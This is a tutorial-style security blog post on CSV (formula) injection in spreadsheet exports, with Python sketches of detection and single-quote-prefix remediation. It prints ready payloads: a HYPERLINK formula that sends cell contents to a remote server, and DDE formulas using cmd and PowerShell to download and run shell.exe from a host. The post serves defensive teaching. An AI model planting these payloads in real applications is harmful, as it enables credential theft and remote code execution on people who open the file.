October 5, 2020

Your Excel Sheets Are Not Safe! Here's How to Beat CSV Injection

Here's something a lot of you might not have thought much about: security vulnerabilities in your Excel sheets. Well, not in the sheets themselves, but in how you transfer or export data into them.

Many web applications let users export data to spreadsheet files such as .CSV or .XLS. This data often contains sensitive information that should be handled safely and securely. In web applications, 'risk handling' is tied to input and output trust boundaries. In a CSV Injection attack, the exported spreadsheet is the untrusted output: opening it could compromise the victim's machine.

CSV Injection occurs when data is not properly validated before it is exported to a spreadsheet cell. The attacker typically injects a malicious payload (a formula) into an input field. Once the data is exported and the file is opened, the spreadsheet application evaluates the payload as if it were an ordinary formula. This can lead to the execution of arbitrary commands on the target machine, potentially giving the attacker complete 'command and control' over the target system.

If that doesn't sound fun, it's because it's not. So how do CSV Injection attacks work? And how do you protect yourself against them?

Formula Injection

The SUM function is a standard formula that adds two or more cells in Excel. For example, =SUM(A1:A3) adds the values in cells A1 through A3.

Seems pretty straightforward, right? So how does something like this actually turn rogue and attack the target system?

Here's how it happens. Before displaying spreadsheet content to the user, Excel treats any cell that begins with an '=' sign as a formula and evaluates the function that follows. These formulae can be crafted so that a malicious payload gets executed when the victim opens the CSV file.

There are 3 key attacks that can be launched using a malicious formula:

  • Hijacking the user’s computer by exploiting vulnerabilities in the spreadsheet software, such as CVE-2014-3524
  • Hijacking the user’s computer by exploiting the user’s tendency to ignore security warnings in spreadsheets that they downloaded from their own website
  • Exfiltrating contents from the spreadsheet, or other open spreadsheets.

An attacker can easily leverage this by injecting different types of formulae into a cell:

  1. Using Excel's HYPERLINK function
  2. Using Windows Command 'cmd'

HYPERLINK

The HYPERLINK formula can be used to exfiltrate confidential data from the cells. This attack is dangerous because HYPERLINK does not prompt any warning when the victim clicks on the malicious link, and the contents of the cells containing confidential data are sent directly to the attacker's web server, which is set up to capture such requests.

For example, consider a website that allows an administrator to export all user details: username, password, transaction history and so on. Suppose a malicious attacker sets his/her name as follows:

=HYPERLINK("http://localhost:4444?leak="&B2&B3&C2&C3,"Pls click for more info")

When the victim opens the file and clicks on the link, the data is directly sent to the remote server.
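
To see why the payload survives the export, here is a minimal Python sketch of a naive export routine. The function name export_users and the sample rows are hypothetical, not taken from any real application. The point is only that a standard CSV writer escapes commas and quotes but gives no special treatment to a leading '=', so the formula reaches the spreadsheet intact.

```python
import csv
import io

# Attacker-controlled profile name (the HYPERLINK payload from the example above).
PAYLOAD = '=HYPERLINK("http://localhost:4444?leak="&B2&B3&C2&C3,"Pls click for more info")'


def export_users(rows):
    """Naively serialize rows to CSV text without neutralizing formulas."""
    buffer = io.StringIO()
    writer = csv.writer(buffer)
    writer.writerow(["Name", "Username", "Password"])
    writer.writerows(rows)
    return buffer.getvalue()


# Made-up sample data for illustration only.
csv_text = export_users([
    [PAYLOAD, "mallory", "not-a-real-password"],
    ["Alice", "alice", "example-1"],
])

# Parsing the file back, as a spreadsheet would, recovers the formula unchanged.
first_data_row = list(csv.reader(io.StringIO(csv_text)))[1]
print(first_data_row[0].startswith("="))  # prints True
```

The CSV quoting keeps the file well-formed, but it is a formatting measure, not a security control: once the quotes are stripped on import, the cell still starts with '='.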

Attack Scenario

Let's see how a malicious user uses HYPERLINK to steal confidential data from a .csv file exported by the administrator.

The malicious user (attacker) sets the name in his/her profile to =HYPERLINK(malicious link). When the victim exports the user data as a .csv file and opens userdetails1.csv in Excel, the HYPERLINK formula gets executed and the name field renders as a link.


Figure 1: The attacker sets a malicious Name (=HYPERLINK(malicious link)) in his profile


Figure 2: When the victim opens the exported CSV file, the attacker's name appears as a clickable link

Now, when the victim (administrator) clicks on the link, the other cells containing sensitive data such as usernames and passwords are appended to the URL and sent to the attacker's web server, where they are captured.


Figure 3: When the victim clicks on the link, the CSV file containing confidential data is captured on the attacker’s server
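
The exfiltration step can be illustrated with a short Python sketch that mimics how the & operator joins cell values onto the link target, then parses the resulting URL the way a receiving web server would. The cell contents are made-up sample values, and build_link and leaked_query are hypothetical helpers; nothing here contacts a network.

```python
from urllib.parse import parse_qs, urlsplit

# Made-up sample cells standing in for the exported sheet.
cells = {"B2": "alice", "B3": "bob", "C2": "pw-one", "C3": "pw-two"}


def build_link(sheet):
    # Mimics the payload's concatenation of B2, B3, C2 and C3 onto the base URL.
    leaked = "".join(sheet[ref] for ref in ("B2", "B3", "C2", "C3"))
    return "http://localhost:4444?leak=" + leaked


def leaked_query(url):
    """Return the query parameters a web server would see for this URL."""
    return parse_qs(urlsplit(url).query)


link = build_link(cells)
print(link)
print(leaked_query(link))
```

Everything the formula referenced ends up in the leak parameter of a single request, which is why one click is enough to disclose several cells at once.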

Command Execution

Here's where it gets interesting: an attacker can use a DDE (Dynamic Data Exchange) formula to execute application commands on a victim's machine running MS Excel on Windows.

For example, to open the calculator application on the target machine one would use the following:

=cmd|' /C calc'!A1

However, this rather unassuming command can be extended to cause devastating attacks on a target user. Opening unvalidated spreadsheet files that contain such DDE formulae could lead to users unwittingly handing an attacker complete command and control of their machine through a shell.

For example, consider the following payload, which an attacker could set as a person's name so that it ends up in the exported spreadsheet:

-2+3+cmd|'/C explorer http://192.168.0.12:8/shell.exe'!A1&cmd|' /C  %USERPROFILE%\Downloads\shell.exe'!A1

Spreadsheet applications usually show warnings when they detect potentially malicious macros/scripts within native files. However, when users ignore or "accept" such warnings, injected payloads such as the one above could leave target systems completely compromised.

The above-mentioned attack could also be carried out using Windows PowerShell:

=cmd|' /C powershell Invoke-WebRequest "http://192.168.0.8:8/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1

Note: To exploit command execution through PowerShell, the victim's machine needs PowerShell 3.0 or above, the version that introduced Invoke-WebRequest.
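
One way to spot such payloads before a file is ever opened in a spreadsheet application is to scan it for cells that start with a character commonly treated as the beginning of a formula. The following Python sketch assumes the four characters '=', '+', '-' and '@'. The helper name find_risky_cells is hypothetical, and the check is a simple prefix test, not a full DDE detector.

```python
import csv
import io

# Leading characters commonly treated as the start of a formula (an assumption
# of this sketch; adjust for the spreadsheet application in use).
FORMULA_TRIGGERS = ("=", "+", "-", "@")


def find_risky_cells(csv_text):
    """Return (row, column, value) for every cell that starts with a trigger.

    Rows and columns are 1-based, matching spreadsheet numbering.
    """
    findings = []
    for row_no, row in enumerate(csv.reader(io.StringIO(csv_text)), start=1):
        for col_no, value in enumerate(row, start=1):
            if value.startswith(FORMULA_TRIGGERS):
                findings.append((row_no, col_no, value))
    return findings


# Made-up sample file containing the calculator payload shown earlier.
sample = "Name,Balance\r\nAlice,100\r\n\"=cmd|' /C calc'!A1\",250\r\n"
for finding in find_risky_cells(sample):
    print(finding)
```

A prefix test like this will also flag legitimate values such as negative numbers, so it is better suited to review and alerting than to silently dropping data.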

Remediation Strategy

Just as they validate user-supplied input, application engineers must validate data before exporting it to native file formats, especially .csv and/or .xls files.

A strategy to mitigate Formula Injection is to prefix a single quote (') to every cell value that begins with one of the following characters:

  • Equals ("=")
  • Plus ("+")
  • Minus ("-")
  • At ("@")

This ensures that the cell is not interpreted as a formula: even if the cell contains a formula, it is displayed as plain text.
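
The prefixing strategy can be sketched in a few lines of Python. The names neutralize_cell and export_rows are hypothetical, and the sketch assumes the export goes through Python's standard csv module; it is an illustration of the idea rather than a complete defense.

```python
import csv
import io

# The four leading characters listed above.
FORMULA_TRIGGERS = ("=", "+", "-", "@")


def neutralize_cell(value):
    """Prefix a single quote when the cell would otherwise start a formula."""
    text = str(value)
    if text.startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_rows(rows):
    """Serialize rows to CSV text, neutralizing every cell on the way out."""
    buffer = io.StringIO()
    writer = csv.writer(buffer)
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buffer.getvalue()


# Made-up sample row: a DDE payload, a harmless name and a negative number.
print(export_rows([["=cmd|' /C calc'!A1", "Alice", -5]]))
```

Note the trade-off: a legitimate negative number such as -5 is also prefixed, because it starts with a minus sign. An application that exports numeric columns may prefer to apply the check only to fields that hold user-supplied text.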